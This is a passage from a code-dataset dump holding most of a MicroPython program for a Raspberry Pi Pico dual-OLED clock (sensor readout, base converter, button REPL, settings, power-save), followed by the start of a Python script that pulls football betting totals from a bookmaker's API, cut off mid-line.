self.oled_0.rect(117, 45, 11, 9, 1)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n self.clear(id=1) # 清除所有\n\n self.oled_1.text(msg_input, 4, 1)\n self.draw_hline(10, id=1, leng=120)\n self.oled_1.text(\"OK\", 2, 16)\n self.oled_1.text(\"RE\", 21, 16)\n self.oled_1.text(\"<\", 40, 16)\n self.oled_1.text(\"-\", 46, 16)\n self.oled_1.text(\"_\", 57, 14)\n self.oled_1.text(\"-\", 68, 17)\n self.oled_1.text(\">\", 74, 17)\n self.oled_1.text(\"BS\", 85, 17)\n\n # 绘制副屏指针框\n if focus_select_y == 0:\n if focus_select_x == 0:\n self.oled_1.rect(2 - 1, 16 - 2, 2 * 8 + 2, 11, 1)\n elif focus_select_x == 1:\n self.oled_1.rect(21 - 1, 16 - 2, 2 * 8 + 2, 11, 1)\n elif focus_select_x == 2:\n self.oled_1.rect(40 - 1, 16 - 2, 2 * 8 + 1, 11, 1)\n elif focus_select_x == 3:\n self.oled_1.rect(57 - 1, 16 - 2, 1 * 8 + 1, 11, 1)\n elif focus_select_x == 4:\n self.oled_1.rect(68 - 1, 16 - 1, 2 * 8 + 1, 11, 1)\n elif focus_select_x == 5:\n self.oled_1.rect(85 - 1, 16 - 1, 2 * 8 + 2, 11, 1)\n\n # 绘制指针\n self.draw_icon(self.icon_dic.get(\"icon_focus_now\"), 2 + 8 * focus_input, 11, id=1)\n\n self.show(id=1) # 绘制所有\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 函数选择窗口\n def fx_window(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n fx_lis = ['acos()', 'acosh()', 'asin()', 'asinh()', 'atan()', 'atanh()',\n 'cos()', 'cosh()', 'degrees()', 'dist()', 'abs()', 'gcd()',\n 'log()', 'log10()', 'pow()', 'radians()', 'sin()', 'sinh()',\n 'sqrt()', 'tan()', 'tanh()']\n fx_lis.sort()\n focus_y = 0\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n if ButtonSign == 'n':\n return 'null'\n elif ButtonSign == 'y':\n return fx_lis[focus_y]\n elif ButtonSign == 'u':\n if focus_y == 0:\n focus_y = len(fx_lis) - 1\n else:\n focus_y -= 1\n elif ButtonSign == 'd':\n if focus_y == len(fx_lis) - 1:\n focus_y = 0\n else:\n focus_y += 1\n elif ButtonSign == 'l':\n if focus_y - 5 < 0:\n focus_y = focus_y + len(fx_lis) - 5\n else:\n focus_y -= 5\n elif ButtonSign == 'r':\n if focus_y + 5 > len(fx_lis) - 1:\n focus_y = focus_y - len(fx_lis) + 5\n else:\n focus_y += 5\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n self.oled_0.text('F(x)=', 3, 3) # 提示\n self.oled_0.text('->', 3, 32) # 箭头\n # 打印函数\n for x in range(5):\n if focus_y + x - 2 <= len(fx_lis) - 1:\n self.oled_0.text(fx_lis[focus_y + x - 2], 20, 32 + (x - 2) * 8)\n else:\n self.oled_0.text(fx_lis[focus_y + x - 2 - len(fx_lis)], 20, 32 + (x - 2) * 8)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 分支功能部分 # 子界面模板\n def fun_model(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n 
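# Note the edge-triggered pattern shared by every screen in this class: a
# press is handled once, then is_button_ready stays 0 until button_sign()
# reports all keys released (these pull-up inputs read 1 when idle), so
# holding a button does not auto-repeat.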
###主屏幕内容###\n            self.clear()  # 清除所有\n            # self.draw_border()  # 绘制边界\n\n            self.show_fps(s=self.current_time[6])  # 显示fps\n            self.show()  # 绘制所有\n\n            ###副屏幕内容###\n\n            self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps)  # 限制帧数\n\n    # 温度/湿度传感器SHT-31\n    def fun_SHT31(self):\n        self.is_init_fps = 0  # fps计数器初始化\n        self.is_button_ready = 0  # 按钮复位标志初始化\n        self.sec_buffer = self.current_time[6]  # 初始化记秒器\n\n        sht31 = sht30.SHT30(sda_pin=8, scl_pin=9)\n\n        self.clear(id=2)\n        self.show(id=2)  # 清空两个屏幕\n        while True:\n            self.current_time = self.rtc.datetime()  # 获取时间\n\n            # 按钮部分\n            ButtonSign = self.button_sign()  # 获取按钮状态\n            # 检测按钮做出反应\n            if ButtonSign != 0 and self.is_button_ready == 1:\n                self.is_button_ready = 0\n                if ButtonSign == 'n':\n                    return 0\n\n            elif ButtonSign == 0 and not self.is_button_ready:\n                self.is_button_ready = 1\n\n            ###主屏幕内容###\n            if self.frame_counter == 0:\n                self.clear()  # 清除所有\n                self.draw_border()  # 绘制边界\n\n                sht_lis = sht31.measure_int()\n                t = ("%2d.%2d" % (sht_lis[0], sht_lis[1]))\n                h = ("%2d.%2d" % (sht_lis[2], sht_lis[3]))\n\n                self.oled_0.text("Temp= " + str(t) + " C", 10, 18)\n                self.oled_0.text("RH= " + str(h) + " %", 26, 28)\n\n                self.show_fps(s=self.current_time[6])  # 显示fps\n                self.draw_icon(self.icon_dic.get('icon_°'), 103, 18)\n                self.show()  # 绘制所有\n\n            ###副屏幕内容###\n            if self.frame_counter == 0:\n                self.clear(id=1)  # 清除所有\n\n                # 显示一个简易时钟\n                self.text_m("%02d:%02d:%02d" % (self.current_time[4], self.current_time[5], self.current_time[6]), 0, id=1)\n\n                self.show(id=1)  # 绘制所有\n\n            self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps)  # 限制帧数\n\n    # 进制转换器\n    def fun_BaseConverter(self):\n        self.is_init_fps = 0  # fps计数器初始化\n        self.is_button_ready = 0  # 按钮复位标志初始化\n        self.sec_buffer = self.current_time[6]  # 初始化记秒器\n        self.clear(id=2)\n        self.show(id=2)  # 清空两个屏幕\n\n        focus_lis = ['HEX', 'DEC', 'OCT', 'BIN', 'RESET']\n        focus_lis_len = len(focus_lis)\n        focus_now = 0\n\n        var_BASE = 0  # BASE变量,本质上是十进制\n        while True:\n            self.current_time = self.rtc.datetime()  # 获取时间\n\n            # 按钮部分\n            ButtonSign = self.button_sign()  # 获取按钮状态\n            # 检测按钮做出反应\n            if ButtonSign != 0 and self.is_button_ready == 1:\n                self.is_button_ready = 0\n                # 返回按钮\n                if ButtonSign == 'n':\n                    return 0\n                # 左或上按钮\n                if ButtonSign == 'l' or ButtonSign == 'u':\n                    if focus_now == 0:\n                        focus_now = focus_lis_len - 1\n                    else:\n                        focus_now -= 1\n                # 右或下按钮\n                if ButtonSign == 'r' or ButtonSign == 'd':\n                    if focus_now == focus_lis_len - 1:\n                        focus_now = 0\n                    else:\n                        focus_now += 1\n                # 确定按钮\n                if ButtonSign == 'y':\n                    try:\n                        if focus_lis[focus_now] == 'HEX':\n                            temp = str(self.input_keyboard())\n                            if temp != 'null':\n                                var_BASE = int(temp, 16)\n                        elif focus_lis[focus_now] == 'DEC':\n                            temp = str(self.input_keyboard())\n                            if temp != 'null':\n                                var_BASE = int(temp)\n                        elif focus_lis[focus_now] == 'OCT':\n                            temp = str(self.input_keyboard())\n                            if temp != 'null':\n                                var_BASE = int(temp, 8)\n                        elif focus_lis[focus_now] == 'BIN':\n                            temp = str(self.input_keyboard())\n                            if temp != 'null':\n                                var_BASE = int(temp, 2)\n                        elif focus_lis[focus_now] == 'RESET':\n                            var_BASE = 0\n                    except ValueError:\n                        self.error_window("ValueError")\n\n            elif ButtonSign == 0 and self.is_button_ready == 0:\n                self.is_button_ready = 1\n\n            # 根据BASE计算其他进制\n            var_HEX = hex(var_BASE)\n            var_DEC = var_BASE\n            var_OCT = oct(var_BASE)\n            var_BIN = bin(var_BASE)\n\n            ###主屏幕内容###\n            self.clear()  # 清除所有\n            self.draw_border()  # 绘制边界\n\n            # HEX\n            self.oled_0.text("HEX=", 3, 8)\n            if len(str(var_HEX)[2:]) <= 10:\n                self.oled_0.text(str(var_HEX)[2:], 3 + 35, 8)\n            else:\n                
self.text_little(str(var_HEX)[2:], 3 + 35, 8 + 2)\n # DEC\n self.oled_0.text(\"DEC=\", 3, 18)\n if len(str(var_DEC)) <= 10:\n self.oled_0.text(str(var_DEC), 3 + 35, 18)\n else:\n self.text_little(str(var_DEC), 3 + 35, 18 + 2)\n # OCT\n self.oled_0.text(\"OCT=\", 3, 28)\n if len(str(var_OCT)[2:]) <= 10:\n self.oled_0.text(str(var_OCT)[2:], 3 + 35, 28)\n else:\n self.text_little(str(var_OCT)[2:], 3 + 35, 28 + 2)\n # BIN\n self.oled_0.text(\"BIN=\", 3, 38)\n if len(str(var_BIN)[2:]) <= 10:\n self.oled_0.text(str(var_BIN)[2:], 3 + 35, 38)\n else:\n self.text_little(str(var_BIN)[2:], 3 + 35, 38 + 2)\n # RESET\n self.text_m(\"RESET\", 48)\n\n if focus_now == 0:\n self.oled_0.rect(37, 6, 88, 11, 1)\n elif focus_now == 1:\n self.oled_0.rect(37, 16, 88, 11, 1)\n elif focus_now == 2:\n self.oled_0.rect(37, 26, 88, 11, 1)\n elif focus_now == 3:\n self.oled_0.rect(37, 36, 88, 11, 1)\n elif focus_now == 4:\n self.oled_0.rect(40, 46, 48, 11, 1)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n if self.frame_counter == 0:\n self.clear(id=1) # 清除所有\n\n self.text_m(\"%02d:%02d:%02d\" % (self.current_time[4], self.current_time[5], self.current_time[6]), 0, id=1)\n\n self.show(id=1) # 绘制所有\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 测试自定义符号\n def fun_IconTest(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n if ButtonSign == 'n':\n return 0\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n\n for i in range(len(self.icon_dic_keys)):\n self.draw_icon(self.icon_dic.get(self.icon_dic_keys[i]), (i % 30) * 4, (i // 30) * 6 + 20)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # REPL\n def fun_REPL(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n # 指令相关\n command = ''\n # 指针相关\n focus_now = 0\n focus_lis = ['input', 'OK', 'RE']\n # 历史记录\n history_lis = []\n\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n # 确认键\n if ButtonSign == 'y':\n # 输入框\n if focus_lis[focus_now] == 'input':\n temp = self.input_keyboard(msg_already=command)\n focus_now = 1\n if temp != 'null':\n command = temp\n # OK\n elif focus_lis[focus_now] == 'OK' and command != '':\n history_lis.insert(0, \" \" + command)\n\n try:\n if command.startswith(\"print\"):\n command = command[6:-1]\n\n eval_result = eval(command)\n history_lis.insert(0, \">>>\" + str(eval_result))\n except SyntaxError:\n history_lis.insert(0, \">>>\" + \"SyntaxError\")\n except NameError:\n history_lis.insert(0, \">>>\" + \"NameError\")\n\n command = ''\n # 重置\n elif focus_lis[focus_now] == 'RE':\n command = ''\n\n # 退出键\n elif ButtonSign == 'n':\n return 0\n # 左键\n elif ButtonSign == 'l':\n if focus_now == 0:\n focus_now = len(focus_lis) - 1\n 
else:\n focus_now -= 1\n # 右键\n elif ButtonSign == 'r':\n if focus_now == len(focus_lis) - 1:\n focus_now = 0\n else:\n focus_now += 1\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n if self.frame_counter % self.refresh_scale == 0:\n self.clear(id=0)\n for i in range(len(history_lis)):\n self.oled_0.text(history_lis[i], 0, 64 - 8 - i * 8)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show(id=0)\n\n ###副屏幕内容###\n # if self.frame_counter % self.refresh_scale == 0:\n if 1:\n self.clear(id=1)\n\n self.text_little(command, 4, 3, 1)\n self.oled_1.text(\"OK\", 2, 16)\n self.oled_1.text(\"RE\", 21, 16)\n\n if focus_lis[focus_now] == 'input':\n self.draw_hline(10, id=1, leng=120)\n elif focus_lis[focus_now] == 'OK':\n self.oled_1.rect(2 - 1, 16 - 2, 2 * 8 + 2, 11, 1)\n elif focus_lis[focus_now] == 'RE':\n self.oled_1.rect(21 - 1, 16 - 2, 2 * 8 + 2, 11, 1)\n\n self.show(id=1)\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 开机logo\n def fun_BootLogo(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = 0 # 初始化记秒器\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n # Raspberry Pi logo as 32x32 bytearray\n logo = bytearray(\n b\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00|?\\x00\\x01\\x86@\\x80\\x01\\x01\\x80\\x80\\x01\\x11\\x88\\x80\"\n b\"\\x01\\x05\\xa0\\x80\\x00\\x83\\xc1\\x00\\x00C\\xe3\\x00\\x00~\\xfc\\x00\\x00L'\\x00\\x00\\x9c\\x11\\x00\\x00\\xbf\\xfd\\x00\"\n b\"\\x00\\xe1\\x87\\x00\\x01\\xc1\\x83\\x80\\x02A\\x82@\\x02A\\x82@\\x02\\xc1\\xc2@\\x02\\xf6>\\xc0\\x01\\xfc=\\x80\\x01\\x18\\x18\"\n b\"\\x80\\x01\\x88\\x10\\x80\\x00\\x8c!\\x00\\x00\\x87\\xf1\\x00\\x00\\x7f\\xf6\\x00\\x008\\x1c\\x00\\x00\\x0c \"\n b\"\\x00\\x00\\x03\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\")\n\n # Load the raspberry pi logo into the framebuffer (the image is 32x32)\n logo = framebuf.FrameBuffer(logo, 32, 32, framebuf.MONO_HLSB)\n\n tim = Timer()\n tim.init(mode=Timer.ONE_SHOT, period=3000, callback=self.timer_shot_BootLogo)\n self.timer_cond_BootLogo = 0\n\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n return 0\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n if self.timer_cond_BootLogo:\n tim.deinit()\n return 0\n\n ###主屏幕内容###\n self.clear() # 清除所有\n\n self.oled_0.blit(logo, 64 - 16, 32 - 16)\n self.text_m(\"Powered by RP2\", 32 + 16 + 4)\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n def timer_shot_BootLogo(self, _):\n self.timer_cond_BootLogo = 1\n\n # 设置弹窗\n def fun_Setting(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n focus_now = 0\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n if ButtonSign == 'l' or ButtonSign == 'u':\n if focus_now:\n focus_now = 0\n else:\n focus_now = 1\n elif ButtonSign == 'r' or ButtonSign == 'd':\n if focus_now:\n focus_now = 0\n else:\n focus_now 
= 1\n elif ButtonSign == 'y':\n if focus_now == 0:\n self.fun_SettingSwitch()\n elif focus_now == 1:\n self.fun_SettingTime()\n elif ButtonSign == 'n':\n return 0\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n self.draw_border() # 绘制边界\n\n self.oled_0.text(\"Choose:\", 24, 13)\n self.oled_0.text(\"Set Switch\", 24, 28)\n self.oled_0.text(\"Set Time\", 24, 43)\n\n self.oled_0.text(\"->\", 4, focus_now * 15 + 28)\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n if self.frame_counter == 0:\n self.clear(id=1)\n self.text_m(\"[Yes] to Confirm\", 16 - 9, id=1)\n self.text_m(\"[NO] to Return \", 16, id=1)\n self.show(id=1)\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 设置(开关)\n def fun_SettingSwitch(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n # 将字典复制为列表\n setting_lis = list(self.setting_dic.items())\n for i in range(len(setting_lis)):\n setting_lis[i] = list(setting_lis[i])\n\n focus_y = 0 # 当前选择\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n # 返回键\n if ButtonSign == 'n':\n return 0\n # 确认键\n elif ButtonSign == 'y':\n self.setting_dic = dict(setting_lis)\n self.setting_control(mode='update')\n self.jump_window(code=\"Updated!\")\n return 0\n # 上\n elif ButtonSign == 'u':\n if focus_y == 0:\n focus_y = len(setting_lis) - 1\n else:\n focus_y -= 1\n # 下\n elif ButtonSign == 'd':\n if focus_y == len(setting_lis) - 1:\n focus_y = 0\n else:\n focus_y += 1\n # 左\n elif ButtonSign == 'l':\n if setting_lis[focus_y][1]:\n setting_lis[focus_y][1] = 0\n else:\n setting_lis[focus_y][1] = 1\n # 右\n elif ButtonSign == 'r':\n if setting_lis[focus_y][1]:\n setting_lis[focus_y][1] = 0\n else:\n setting_lis[focus_y][1] = 1\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n self.oled_0.text('->', 3, 32) # 箭头\n\n for i in [-2, -1, 0, 1, 2]:\n\n try:\n if focus_y + i >= 0:\n # 打印选项名\n if len(setting_lis[focus_y + i]) <= 9:\n self.oled_0.text(setting_lis[focus_y + i][0], 20, 32 + i * 8)\n else:\n self.text_little(setting_lis[focus_y + i][0], 20, 32 + i * 8)\n # 打印状态\n if setting_lis[focus_y + i][1]:\n self.oled_0.text(\"En\", 100, 32 + i * 8)\n else:\n self.oled_0.text(\"Dis\", 100, 32 + i * 8)\n else:\n pass\n except Exception:\n pass\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n if self.frame_counter == 0:\n self.clear(id=1)\n self.text_m(\"[Yes] to Confirm\", 16 - 9, id=1)\n self.text_m(\"[NO] to Return \", 16, id=1)\n self.show(id=1)\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 设置(时间)\n def fun_SettingTime(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n\n # sec min hour week day mon year\n NowTime = b'\\x00\\x00\\x15\\x04\\x21\\x01\\x21'\n\n focus_now = 0 # 当前选择\n setting_lis = ['Set Hour', 'Set Minute', 'Set Second',\n 'Set Year', 'Set Month', 'Set Day', 'Set Week']\n week_lis = [\"Mon\", \"Tues\", \"Wed\", \"Thur\", \"Fri\", \"Sat\", \"Sun\"]\n 
while True:\n            self.current_time = self.rtc.datetime()\n            self.ds3231_time = ds3231.ReportList()  # 获取时间\n\n            # 按钮部分\n            ButtonSign = self.button_sign()  # 获取按钮状态\n            # 检测按钮做出反应\n            if ButtonSign != 0 and self.is_button_ready == 1:\n                self.is_button_ready = 0\n                # 返回键\n                if ButtonSign == 'n':\n                    return 0\n                # 确认键\n                elif ButtonSign == 'y':\n\n                    temp = self.input_keyboard()\n                    if temp != 'null' and 1 <= len(temp) <= 2 and temp.isdigit():\n                        ind = int(temp)\n                        time_set = self.ds3231_time.copy()\n\n                        ok = 1\n\n                        if setting_lis[focus_now] == 'Set Second' and 0 <= ind <= 59:\n                            time_set[0] = ind\n                        elif setting_lis[focus_now] == 'Set Minute' and 0 <= ind <= 59:\n                            time_set[1] = ind\n                        elif setting_lis[focus_now] == 'Set Hour' and 0 <= ind <= 23:\n                            time_set[2] = ind\n                        elif setting_lis[focus_now] == 'Set Week' and 0 <= ind <= 7:\n                            time_set[3] = ind - 1\n                        elif setting_lis[focus_now] == 'Set Day' and 0 <= ind <= 31:\n                            time_set[4] = ind\n                        elif setting_lis[focus_now] == 'Set Month' and 0 <= ind <= 12:\n                            time_set[5] = ind\n                        elif setting_lis[focus_now] == 'Set Year' and 0 <= ind <= 99:\n                            time_set[6] = ind\n                        else:\n                            ok = 0\n\n                        if ok:\n                            # 先将10进制当作16进制转换为10进制,因为bytes()会把10进制转换为16进制\n                            for i in range(len(time_set)):\n                                time_set[i] = int(str(time_set[i]), 16)\n                            time_set = bytes(time_set)\n                            ds3231.SetTime(time_set)\n\n                            self.init_rtc(mode='update')\n\n                            self.jump_window(code='Success')\n                    else:\n                        self.error_window(code='Wrong Input')\n\n\n                # 上\n                elif ButtonSign == 'u' or ButtonSign == 'l':\n                    if focus_now == 0:\n                        focus_now = len(setting_lis) - 1\n                    else:\n                        focus_now -= 1\n                # 下\n                elif ButtonSign == 'd' or ButtonSign == 'r':\n                    if focus_now == len(setting_lis) - 1:\n                        focus_now = 0\n                    else:\n                        focus_now += 1\n\n            elif ButtonSign == 0 and self.is_button_ready == 0:\n                self.is_button_ready = 1\n\n            ###主屏幕内容###\n            self.clear()  # 清除所有\n            self.oled_0.text('->', 3, 32)  # 箭头\n\n            for i in [-2, -1, 0, 1, 2]:\n                try:\n                    if focus_now + i >= 0:\n                        # 打印选项名\n                        self.oled_0.text(setting_lis[focus_now + i], 20, 32 + i * 8)\n                    else:\n                        pass\n                except Exception:\n                    pass\n\n            self.show_fps(s=self.current_time[6])  # 显示fps\n            self.show()  # 绘制所有\n\n            ###副屏幕内容###\n            if self.frame_counter == 0:\n                self.clear(id=1)\n                # 绘制时间\n                self.oled_1.text("Time=%02d:%02d:%02d" % (self.current_time[4], self.current_time[5], self.current_time[6]),\n                                 0, 0)\n                # 绘制日期\n                self.oled_1.text("Date=%d/%02d/%02d" % (self.current_time[0], self.current_time[1], self.current_time[2]),\n                                 0, 8)\n                # 绘制星期\n                self.oled_1.text("Day of Week=%s" % (week_lis[self.current_time[3]]), 0, 16)\n                self.show(id=1)\n\n            self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps)  # 限制帧数\n\n    # 单位转换器\n    def fun_UnitConverter(self):\n        self.is_init_fps = 0  # fps计数器初始化\n        self.is_button_ready = 0  # 按钮复位标志初始化\n        self.sec_buffer = self.current_time[6]  # 初始化记秒器\n\n        self.clear(id=2)\n        self.show(id=2)  # 清空两个屏幕\n        while True:\n            self.current_time = self.rtc.datetime()  # 获取时间\n\n            # 按钮部分\n            ButtonSign = self.button_sign()  # 获取按钮状态\n            # 检测按钮做出反应\n            if ButtonSign != 0 and self.is_button_ready == 1:\n                self.is_button_ready = 0\n                return 0\n\n            elif ButtonSign == 0 and self.is_button_ready == 0:\n                self.is_button_ready = 1\n\n            ###主屏幕内容###\n            self.clear()  # 清除所有\n            # self.draw_border()  # 绘制边界\n\n            self.show_fps(s=self.current_time[6])  # 显示fps\n            self.show()  # 绘制所有\n\n            ###副屏幕内容###\n\n            self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps)  # 限制帧数\n\n    # 省电模式\n    def fun_PowerSave(self):\n        while self.button_sign():\n            sleep_ms(300)\n\n        print("Enter PowerSave Mode")\n\n        # 清除所有画面\n        self.clear(id=2)\n        self.show(id=2)\n\n        
self.oled_1.poweroff()\n self.oled_0.contrast(0)\n\n self.button_l.irq(trigger=Pin.IRQ_FALLING, handler=self.PowerSaveClean)\n self.button_r.irq(trigger=Pin.IRQ_FALLING, handler=self.PowerSaveClean)\n self.button_u.irq(trigger=Pin.IRQ_FALLING, handler=self.PowerSaveClean)\n self.button_d.irq(trigger=Pin.IRQ_FALLING, handler=self.PowerSaveClean)\n self.button_y.irq(trigger=Pin.IRQ_FALLING, handler=self.PowerSaveClean)\n self.button_n.irq(trigger=Pin.IRQ_FALLING, handler=self.PowerSaveClean)\n\n self.update_time = 15 * 1000\n self.is_PowerSave = 1\n div = 10\n\n while True:\n if not self.is_PowerSave:\n return 0\n\n self.current_time = ds3231.ReportList() # 获取时间\n ###主屏幕内容###\n self.clear() # 清除所有\n self.text_m(\"%02d:%02d\" % (self.current_time[2], self.current_time[1]), random.randint(0, 56)) # 绘制时间\n self.show() # 绘制所有\n\n for _ in range(div):\n sleep_ms(int(self.update_time/div))\n def PowerSaveClean(self, _):\n print(\"Exit PowerSave Mode\")\n self.button_l.irq(handler=None)\n self.button_r.irq(handler=None)\n self.button_u.irq(handler=None)\n self.button_d.irq(handler=None)\n self.button_y.irq(handler=None)\n self.button_n.irq(handler=None)\n self.is_PowerSave = 0\n self.update_time = 0\n self.oled_1.poweron()\n self.oled_0.contrast(255)\n\n\nif __name__ == '__main__':\n PicoClock()\n","repo_name":"CaliFall/PicoClock","sub_path":"程序源码/PicoClockAlpha.py","file_name":"PicoClockAlpha.py","file_ext":"py","file_size_in_byte":66210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18802479270","text":"import requests\n\ndef finder(t1, t2):\n t1_matches = requests.get(f'https://m.melbet.ru/LineFeed/Web_SearchZip?text={t1}&limit=150&lng=ru&partner=195&mode=6')\n t2_matches = requests.get(f'https://m.melbet.ru/LineFeed/Web_SearchZip?text={t2}&limit=150&lng=ru&partner=195&mode=6')\n\n matches1 = t1_matches.json()\n matches2 = t2_matches.json()\n \n matches1 = matches1['Value']\n matches2 = matches2['Value']\n total_t1_b, total_t1_m, total_t2_b, total_t2_m = '~','~','~','~'\n try:\n for match in matches1:\n for match2 in matches2:\n if match2['CI'] == match['CI']:\n LI = match['LI'] # leageu code (first arg)\n CI = match['CI'] # match code\n LE = match['LE'] # league name\n O1 = match['O1E'] # first team\n O2 = match['O2E'] #second team\n \n id_t = requests.get(f'https://m.melbet.ru/LineFeed/GetGameZip?id={CI}&lng=ru&cfview=0&isSubGames=true&GroupEvents=true&countevents=50&partner=195&grMode=2').json()\n\n I = id_t['Value']['SG'][0]['I']\n\n l = O1.split()\n O1 = '-'.join(l)\n l = O2.split()\n O2 = '-'.join(l) \n \n LE = LE.split('.')\n LE = ''.join(LE)\n l = LE.strip('.').split()\n LE = '-'.join(l) \n\n #href = f'https://m.melbet.ru/line/Football/{LI}-{LE}/{CI}-{O1}-{O2}' #https://m.melbet.ru/LineFeed/GetGameZip?id=96230530&lng=ru&cfview=0&isSubGames=true&GroupEvents=true&countevents=50&partner=195&grMode=2\n \n rrrr = requests.get(f'https://m.melbet.ru/LineFeed/GetGameZip?id={I}&lng=ru&cfview=0&isSubGames=true&GroupEvents=true&countevents=200&partner=195&grMode=2').json()\n\n all_params = rrrr['Value']\n all_totals = all_params['GE']\n \n total_t1_b = all_totals[7]['E'][0][0]['C'] \n total_t1_m = all_totals[7]['E'][1][0]['C']\n\n total_t2_b = all_totals[9]['E'][0][0]['C']\n total_t2_m = 